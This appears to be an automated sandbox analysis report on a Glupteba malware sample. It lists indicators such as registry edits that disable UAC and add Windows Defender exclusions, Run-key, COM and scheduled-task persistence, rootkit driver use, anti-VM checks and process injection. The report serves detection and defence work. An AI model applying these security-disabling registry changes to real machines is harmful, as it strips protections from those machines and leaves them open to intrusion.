glupteba | ec91ef3c4c02b6c8aff61058bf0b2bb013e2e6a2ee6c805c6d07ad0ae46fa9d1

Bypass User Account Control

T1548.002

Disable or Modify Tools

Modify Registry

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	ec91ef3c4c02b6c8aff61058bf0b2bb013e2e6a2ee6c805c6d07ad0ae46fa9d1.exe

Windows security bypass 2 TTPs 9 IoCs

Disable or Modify Tools

Modify Registry

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0"	gsqMDm4xp0qpvH7w0yVvaAb0.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\ec91ef3c4c02b6c8aff61058bf0b2bb013e2e6a2ee6c805c6d07ad0ae46fa9d1.exe = "0"	ec91ef3c4c02b6c8aff61058bf0b2bb013e2e6a2ee6c805c6d07ad0ae46fa9d1.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0"	gsqMDm4xp0qpvH7w0yVvaAb0.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0"	gsqMDm4xp0qpvH7w0yVvaAb0.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0"	gsqMDm4xp0qpvH7w0yVvaAb0.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\gsqMDm4xp0qpvH7w0yVvaAb0.exe = "0"	gsqMDm4xp0qpvH7w0yVvaAb0.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	ec91ef3c4c02b6c8aff61058bf0b2bb013e2e6a2ee6c805c6d07ad0ae46fa9d1.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0"	gsqMDm4xp0qpvH7w0yVvaAb0.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0"	gsqMDm4xp0qpvH7w0yVvaAb0.exe

Downloads MZ/PE file

Modifies Windows Firewall 1 TTPs 1 IoCs

evasion

Windows Service

T1543.003

pid	Process
876	netsh.exe

Drops startup file 8 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\qn5Jyz1QfmhyYD2ugoAw38mR.bat	CasPol.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\rN6Fm00fQz5qemTrU9oHd0nL.bat	CasPol.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\4fTVATcEE7QaqGefwupP64Wn.bat	CasPol.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\JDRELCqntCAMuql8rez4oAxw.bat	CasPol.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\I7XLQHNttQ5guuNbjiZlGaXf.bat	CasPol.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pQU0OJZYu297B2SL9K0kadYO.bat	CasPol.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\qaHTyhKouLKTk5cInhX0wLiD.bat	CasPol.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\JC4io1yCdTVjcXGOYgnLeWaN.bat	CasPol.exe

Executes dropped EXE 15 IoCs

pid	Process
676	5wnd2A7wo6BfQ2YU5OgrO2ST.exe
1508	87Q9M1nYfzuP5odacHp1DUMF.exe
2400	cxczNoZLbxame90AQVhkWLR0.exe
1736	gsqMDm4xp0qpvH7w0yVvaAb0.exe
1080	lcDq23eDXskQBaEJxI0TthYF.exe
2008	ed80OmEWuScDikzRSZGz2MqO.exe
1592	gsqMDm4xp0qpvH7w0yVvaAb0.exe
1532	csrss.exe
2052	87Q9M1nYfzuP5odacHp1DUMF.exe
572	cxczNoZLbxame90AQVhkWLR0.tmp
2808	patch.exe
568	injector.exe
2404	windefender.exe
2280	windefender.exe
2036	dcb505dc2b9d8aac05f4ca0727f5eadb.exe

Loads dropped DLL 33 IoCs

pid	Process
1156	CasPol.exe
1156	CasPol.exe
1156	CasPol.exe
1156	CasPol.exe
1156	CasPol.exe
1156	CasPol.exe
1156	CasPol.exe
1156	CasPol.exe
1080	lcDq23eDXskQBaEJxI0TthYF.exe
1080	lcDq23eDXskQBaEJxI0TthYF.exe
1156	CasPol.exe
2008	ed80OmEWuScDikzRSZGz2MqO.exe
2008	ed80OmEWuScDikzRSZGz2MqO.exe
1592	gsqMDm4xp0qpvH7w0yVvaAb0.exe
1592	gsqMDm4xp0qpvH7w0yVvaAb0.exe
2400	cxczNoZLbxame90AQVhkWLR0.exe
572	cxczNoZLbxame90AQVhkWLR0.tmp
572	cxczNoZLbxame90AQVhkWLR0.tmp
572	cxczNoZLbxame90AQVhkWLR0.tmp
572	cxczNoZLbxame90AQVhkWLR0.tmp
868	Process not Found
2808	patch.exe
2808	patch.exe
2808	patch.exe
2808	patch.exe
2808	patch.exe
1532	csrss.exe
1080	lcDq23eDXskQBaEJxI0TthYF.exe
2808	patch.exe
2808	patch.exe
2808	patch.exe
1532	csrss.exe
1532	csrss.exe

Registers COM server for autorun 1 TTPs 11 IoCs

persistence

Registry Run Keys / Startup Folder

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{2E73E490-044A-BCA3-723A-A31F0132C80A}\InProcServer32\ThreadingModel = "Apartment"	lcDq23eDXskQBaEJxI0TthYF.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{2E73E490-044A-BCA3-723A-A31F0132C80A}\InProcServer32	lcDq23eDXskQBaEJxI0TthYF.exe
Key created	\REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000_CLASSES\CLSID\{2E73E490-044A-BCA3-723A-A31F0132C80A}\InProcServer32	lcDq23eDXskQBaEJxI0TthYF.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1A73E490-044A-BCA3-723A-A31F0132C80A}\InProcServer32	lcDq23eDXskQBaEJxI0TthYF.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1A73E490-044A-BCA3-723A-A31F0132C80A}\InProcServer32\ = "C:\\Windows\\Panther\\UnattendGC\\EEMacro.dll"	lcDq23eDXskQBaEJxI0TthYF.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1F73E490-044A-BCA3-723A-A31F0132C80A}\InProcServer32\ = "C:\\Windows\\Panther\\UnattendGC\\EEMacro.dll"	lcDq23eDXskQBaEJxI0TthYF.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1F73E490-044A-BCA3-723A-A31F0132C80A}\InProcServer32\ThreadingModel = "Apartment"	lcDq23eDXskQBaEJxI0TthYF.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1F73E490-044A-BCA3-723A-A31F0132C80A}\InProcServer32	lcDq23eDXskQBaEJxI0TthYF.exe
Key created	\REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000_CLASSES\CLSID\{1F73E490-044A-BCA3-723A-A31F0132C80A}\InProcServer32	lcDq23eDXskQBaEJxI0TthYF.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1A73E490-044A-BCA3-723A-A31F0132C80A}\InProcServer32\ThreadingModel = "Apartment"	lcDq23eDXskQBaEJxI0TthYF.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{2E73E490-044A-BCA3-723A-A31F0132C80A}\InProcServer32\ = "C:\\Windows\\Panther\\UnattendGC\\EEMacro.dll"	lcDq23eDXskQBaEJxI0TthYF.exe

UPX packed file 15 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x0006000000016fed-251.dat	upx
behavioral1/memory/2008-254-0x00000000000B0000-0x00000000005D8000-memory.dmp	upx
behavioral1/files/0x0006000000016fed-250.dat	upx
behavioral1/files/0x0006000000016fed-248.dat	upx
behavioral1/memory/2008-316-0x00000000000B0000-0x00000000005D8000-memory.dmp	upx
behavioral1/files/0x000700000001a43c-759.dat	upx
behavioral1/files/0x000700000001a43c-760.dat	upx
behavioral1/memory/2404-762-0x0000000000400000-0x00000000008DF000-memory.dmp	upx
behavioral1/files/0x000700000001a43c-761.dat	upx
behavioral1/files/0x0009000000005a59-764.dat	upx
behavioral1/files/0x000400000001d7d7-778.dat	upx
behavioral1/files/0x000400000001d7d7-777.dat	upx
behavioral1/files/0x000400000001d7d7-774.dat	upx
behavioral1/files/0x000400000001d80e-785.dat	upx
behavioral1/memory/2036-789-0x0000000000400000-0x00000000008E1000-memory.dmp	upx

Windows security modification 2 TTPs 10 IoCs

Disable or Modify Tools

Modify Registry

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions	ec91ef3c4c02b6c8aff61058bf0b2bb013e2e6a2ee6c805c6d07ad0ae46fa9d1.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0"	gsqMDm4xp0qpvH7w0yVvaAb0.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0"	gsqMDm4xp0qpvH7w0yVvaAb0.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0"	gsqMDm4xp0qpvH7w0yVvaAb0.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	ec91ef3c4c02b6c8aff61058bf0b2bb013e2e6a2ee6c805c6d07ad0ae46fa9d1.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\ec91ef3c4c02b6c8aff61058bf0b2bb013e2e6a2ee6c805c6d07ad0ae46fa9d1.exe = "0"	ec91ef3c4c02b6c8aff61058bf0b2bb013e2e6a2ee6c805c6d07ad0ae46fa9d1.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0"	gsqMDm4xp0qpvH7w0yVvaAb0.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0"	gsqMDm4xp0qpvH7w0yVvaAb0.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0"	gsqMDm4xp0qpvH7w0yVvaAb0.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\gsqMDm4xp0qpvH7w0yVvaAb0.exe = "0"	gsqMDm4xp0qpvH7w0yVvaAb0.exe

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

Modify Registry

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\""	gsqMDm4xp0qpvH7w0yVvaAb0.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\""	csrss.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Checks whether UAC is enabled 1 TTPs 2 IoCs

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	ec91ef3c4c02b6c8aff61058bf0b2bb013e2e6a2ee6c805c6d07ad0ae46fa9d1.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	ec91ef3c4c02b6c8aff61058bf0b2bb013e2e6a2ee6c805c6d07ad0ae46fa9d1.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Manipulates WinMonFS driver. 1 IoCs

Roottkits write to WinMonFS to hide directories/files from being detected.

rootkit evasion

description	ioc	Process
File opened for modification	\??\WinMonFS	csrss.exe

Modifies boot configuration data using bcdedit 1 IoCs

pid	Process
1896	bcdedit.exe

Suspicious use of SetThreadContext 2 IoCs

description	pid	Process	procid_target
PID 2240 set thread context of 1156	2240	ec91ef3c4c02b6c8aff61058bf0b2bb013e2e6a2ee6c805c6d07ad0ae46fa9d1.exe	21
PID 676 set thread context of 2516	676	5wnd2A7wo6BfQ2YU5OgrO2ST.exe	40

Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 2 IoCs

Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\VBoxMiniRdrDN	gsqMDm4xp0qpvH7w0yVvaAb0.exe
File opened (read-only)	\??\VBoxMiniRdrDN	87Q9M1nYfzuP5odacHp1DUMF.exe

Drops file in Program Files directory 64 IoCs

description	ioc	Process
File created	C:\Program Files (x86)\ClocX\Lang\Traditional_Chinese.lng	lcDq23eDXskQBaEJxI0TthYF.exe
File created	C:\Program Files (x86)\ClocX\Presets\Amarillo.png	lcDq23eDXskQBaEJxI0TthYF.exe
File created	C:\Program Files (x86)\ClocX\Presets\BlueAppleClock.ini	lcDq23eDXskQBaEJxI0TthYF.exe
File created	C:\Program Files (x86)\ClocX\Presets\BlueSphere.png	lcDq23eDXskQBaEJxI0TthYF.exe
File created	C:\Program Files (x86)\MPhoneSTD\bin\x86\is-FDSLG.tmp	cxczNoZLbxame90AQVhkWLR0.tmp
File created	C:\Program Files (x86)\ClocX\Presets\BlueBallRoman.png	lcDq23eDXskQBaEJxI0TthYF.exe
File created	C:\Program Files (x86)\ClocX\Presets\Octopye2.ini	lcDq23eDXskQBaEJxI0TthYF.exe
File created	C:\Program Files (x86)\MPhoneSTD\bin\x86\is-NG68B.tmp	cxczNoZLbxame90AQVhkWLR0.tmp
File created	C:\Program Files (x86)\MPhoneSTD\bin\x86\is-AL5VM.tmp	cxczNoZLbxame90AQVhkWLR0.tmp
File created	C:\Program Files (x86)\ClocX\Lang\Slovak.lng	lcDq23eDXskQBaEJxI0TthYF.exe
File created	C:\Program Files (x86)\ClocX\Presets\BallClockAqua.bmp	lcDq23eDXskQBaEJxI0TthYF.exe
File created	C:\Program Files (x86)\ClocX\Presets\Comdex - Omega1.png	lcDq23eDXskQBaEJxI0TthYF.exe
File created	C:\Program Files (x86)\MPhoneSTD\bin\x86\is-6C5D5.tmp	cxczNoZLbxame90AQVhkWLR0.tmp
File created	C:\Program Files (x86)\ClocX\Presets\Adler.png	lcDq23eDXskQBaEJxI0TthYF.exe
File created	C:\Program Files (x86)\ClocX\Presets\BlueAppleClock.png	lcDq23eDXskQBaEJxI0TthYF.exe
File created	C:\Program Files (x86)\ClocX\Presets\MickeyMouse.ini	lcDq23eDXskQBaEJxI0TthYF.exe
File created	C:\Program Files (x86)\ClocX\Presets\negro2.ini	lcDq23eDXskQBaEJxI0TthYF.exe
File created	C:\Program Files (x86)\ClocX\Presets\greenmarble\marblehour.png	lcDq23eDXskQBaEJxI0TthYF.exe
File created	C:\Program Files (x86)\ClocX\Sounds\alert.mp3	lcDq23eDXskQBaEJxI0TthYF.exe
File created	C:\Program Files (x86)\MPhoneSTD\bin\x86\is-FMN3Q.tmp	cxczNoZLbxame90AQVhkWLR0.tmp
File created	C:\Program Files (x86)\MPhoneSTD\bin\x86\is-L52E2.tmp	cxczNoZLbxame90AQVhkWLR0.tmp
File created	C:\Program Files (x86)\ClocX\Lang\Hungarian.lng	lcDq23eDXskQBaEJxI0TthYF.exe
File created	C:\Program Files (x86)\ClocX\Lang\Svenska.lng	lcDq23eDXskQBaEJxI0TthYF.exe
File created	C:\Program Files (x86)\ClocX\Presets\BlueBallRoman.ini	lcDq23eDXskQBaEJxI0TthYF.exe
File created	C:\Program Files (x86)\ClocX\Presets\Metalluhr.png	lcDq23eDXskQBaEJxI0TthYF.exe
File created	C:\Program Files (x86)\ClocX\Presets\Uhr.png	lcDq23eDXskQBaEJxI0TthYF.exe
File created	C:\Program Files (x86)\MPhoneSTD\bin\x86\is-G7304.tmp	cxczNoZLbxame90AQVhkWLR0.tmp
File created	C:\Program Files (x86)\ClocX\Presets\AquaMade.png	lcDq23eDXskQBaEJxI0TthYF.exe
File created	C:\Program Files (x86)\ClocX\Presets\Bahnhofsuhr.png	lcDq23eDXskQBaEJxI0TthYF.exe
File created	C:\Program Files (x86)\ClocX\Presets\Comdex - Omega1.ini	lcDq23eDXskQBaEJxI0TthYF.exe
File created	C:\Program Files (x86)\MPhoneSTD\stuff\is-GU1NI.tmp	cxczNoZLbxame90AQVhkWLR0.tmp
File created	C:\Program Files (x86)\ClocX\Presets\Casio.ini	lcDq23eDXskQBaEJxI0TthYF.exe
File created	C:\Program Files (x86)\ClocX\Presets\Omega.png	lcDq23eDXskQBaEJxI0TthYF.exe
File created	C:\Program Files (x86)\ClocX\Presets\alarme.png	lcDq23eDXskQBaEJxI0TthYF.exe
File created	C:\Program Files (x86)\ClocX\Presets\BlueSphere.bmp	lcDq23eDXskQBaEJxI0TthYF.exe
File created	C:\Program Files (x86)\MPhoneSTD\bin\x86\is-GFC2G.tmp	cxczNoZLbxame90AQVhkWLR0.tmp
File created	C:\Program Files (x86)\ClocX\Presets\BallClockAmber.bmp	lcDq23eDXskQBaEJxI0TthYF.exe
File created	C:\Program Files (x86)\ClocX\Presets\LongClock.bmp	lcDq23eDXskQBaEJxI0TthYF.exe
File created	C:\Program Files (x86)\ClocX\Presets\longhorn.ini	lcDq23eDXskQBaEJxI0TthYF.exe
File created	C:\Program Files (x86)\360\360Safe\deepscan\speedmem2.hg	lcDq23eDXskQBaEJxI0TthYF.exe
File created	C:\Program Files (x86)\ClocX\Lang\Portuguese.lng	lcDq23eDXskQBaEJxI0TthYF.exe
File created	C:\Program Files (x86)\ClocX\Presets\Casio.png	lcDq23eDXskQBaEJxI0TthYF.exe
File created	C:\Program Files (x86)\ClocX\Presets\Wall Clock medium.ini	lcDq23eDXskQBaEJxI0TthYF.exe
File created	C:\Program Files (x86)\ClocX\ClocX.exe	lcDq23eDXskQBaEJxI0TthYF.exe
File created	C:\Program Files (x86)\ClocX\Presets\VioletteKugler.ini	lcDq23eDXskQBaEJxI0TthYF.exe
File created	C:\Program Files (x86)\ClocX\Presets\BigBen.png	lcDq23eDXskQBaEJxI0TthYF.exe
File created	C:\Program Files (x86)\ClocX\Presets\IvyLace.png	lcDq23eDXskQBaEJxI0TthYF.exe
File created	C:\Program Files (x86)\ClocX\Presets\domeclock\domehour.png	lcDq23eDXskQBaEJxI0TthYF.exe
File created	C:\Program Files (x86)\MPhoneSTD\bin\x86\is-JS83M.tmp	cxczNoZLbxame90AQVhkWLR0.tmp
File created	C:\Program Files (x86)\ClocX\Lang\Czech.lng	lcDq23eDXskQBaEJxI0TthYF.exe
File created	C:\Program Files (x86)\ClocX\Presets\BaiWeather.ini	lcDq23eDXskQBaEJxI0TthYF.exe
File created	C:\Program Files (x86)\ClocX\Presets\BlueSphere2.png	lcDq23eDXskQBaEJxI0TthYF.exe
File created	C:\Program Files (x86)\ClocX\Lang\Brazilian Portuguese.lng	lcDq23eDXskQBaEJxI0TthYF.exe
File created	C:\Program Files (x86)\MPhoneSTD\bin\x86\is-BI9J1.tmp	cxczNoZLbxame90AQVhkWLR0.tmp
File created	C:\Program Files (x86)\ClocX\Presets\White_Apple_Clock.png	lcDq23eDXskQBaEJxI0TthYF.exe
File created	C:\Program Files (x86)\ClocX\Presets\roman\romanminute.png	lcDq23eDXskQBaEJxI0TthYF.exe
File created	C:\Program Files (x86)\MPhoneSTD\bin\x86\is-F9T9G.tmp	cxczNoZLbxame90AQVhkWLR0.tmp
File created	C:\Program Files (x86)\ClocX\Presets\Unreal.png	lcDq23eDXskQBaEJxI0TthYF.exe
File created	C:\Program Files (x86)\ClocX\Presets\GroenneKugler.ini	lcDq23eDXskQBaEJxI0TthYF.exe
File created	C:\Program Files (x86)\ClocX\Presets\Aqua.bmp	lcDq23eDXskQBaEJxI0TthYF.exe
File created	C:\Program Files (x86)\ClocX\Presets\Cappuccino.png	lcDq23eDXskQBaEJxI0TthYF.exe
File created	C:\Program Files (x86)\ClocX\Presets\aqua-clock1.bmp	lcDq23eDXskQBaEJxI0TthYF.exe
File created	C:\Program Files (x86)\ClocX\Presets\default.bmp	lcDq23eDXskQBaEJxI0TthYF.exe
File created	C:\Program Files (x86)\MPhoneSTD\bin\x86\is-IT6TT.tmp	cxczNoZLbxame90AQVhkWLR0.tmp

Drops file in Windows directory 6 IoCs

description	ioc	Process
File created	C:\Windows\Logs\CBS\CbsPersist_20231218050514.cab	makecab.exe
File created	C:\Windows\windefender.exe	csrss.exe
File opened for modification	C:\Windows\windefender.exe	csrss.exe
File created	C:\Windows\Panther\UnattendGC\EEMacro.dll	lcDq23eDXskQBaEJxI0TthYF.exe
File opened for modification	C:\Windows\rss	gsqMDm4xp0qpvH7w0yVvaAb0.exe
File created	C:\Windows\rss\csrss.exe	gsqMDm4xp0qpvH7w0yVvaAb0.exe

Launches sc.exe 1 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
1836	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

NSIS installer 8 IoCs

installer

resource	yara_rule
behavioral1/files/0x0006000000016d16-211.dat	nsis_installer_1
behavioral1/files/0x0006000000016d16-211.dat	nsis_installer_2
behavioral1/files/0x0006000000016d16-214.dat	nsis_installer_1
behavioral1/files/0x0006000000016d16-214.dat	nsis_installer_2
behavioral1/files/0x0006000000016d16-215.dat	nsis_installer_1
behavioral1/files/0x0006000000016d16-215.dat	nsis_installer_2
behavioral1/files/0x0006000000016d16-213.dat	nsis_installer_1
behavioral1/files/0x0006000000016d16-213.dat	nsis_installer_2

Creates scheduled task(s) 1 TTPs 2 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

pid	Process
2484	schtasks.exe
2144	schtasks.exe

Modifies data under HKEY_USERS 64 IoCs

description	ioc	Process
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-448 = "Azerbaijan Daylight Time"	gsqMDm4xp0qpvH7w0yVvaAb0.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-452 = "Caucasus Standard Time"	gsqMDm4xp0qpvH7w0yVvaAb0.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-512 = "Central Asia Standard Time"	gsqMDm4xp0qpvH7w0yVvaAb0.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-51 = "Greenland Daylight Time"	gsqMDm4xp0qpvH7w0yVvaAb0.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-592 = "Malay Peninsula Standard Time"	gsqMDm4xp0qpvH7w0yVvaAb0.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-572 = "China Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-42 = "E. South America Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-552 = "North Asia Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-551 = "North Asia Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-832 = "SA Eastern Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-122 = "SA Pacific Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-1411 = "Syria Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-691 = "Tasmania Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-632 = "Tokyo Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-621 = "Korea Daylight Time"	gsqMDm4xp0qpvH7w0yVvaAb0.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-591 = "Malay Peninsula Daylight Time"	gsqMDm4xp0qpvH7w0yVvaAb0.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-721 = "Central Pacific Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-472 = "Ekaterinburg Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-731 = "Fiji Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-521 = "N. Central Asia Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-121 = "SA Pacific Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-435 = "Georgian Standard Time"	gsqMDm4xp0qpvH7w0yVvaAb0.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-511 = "Central Asia Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-251 = "Dateline Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-422 = "Russian Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-831 = "SA Eastern Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-261 = "GMT Daylight Time"	gsqMDm4xp0qpvH7w0yVvaAb0.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-361 = "GTB Daylight Time"	gsqMDm4xp0qpvH7w0yVvaAb0.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-301 = "Romance Daylight Time"	gsqMDm4xp0qpvH7w0yVvaAb0.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-1042 = "Ulaanbaatar Standard Time"	gsqMDm4xp0qpvH7w0yVvaAb0.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-11 = "Azores Daylight Time"	windefender.exe
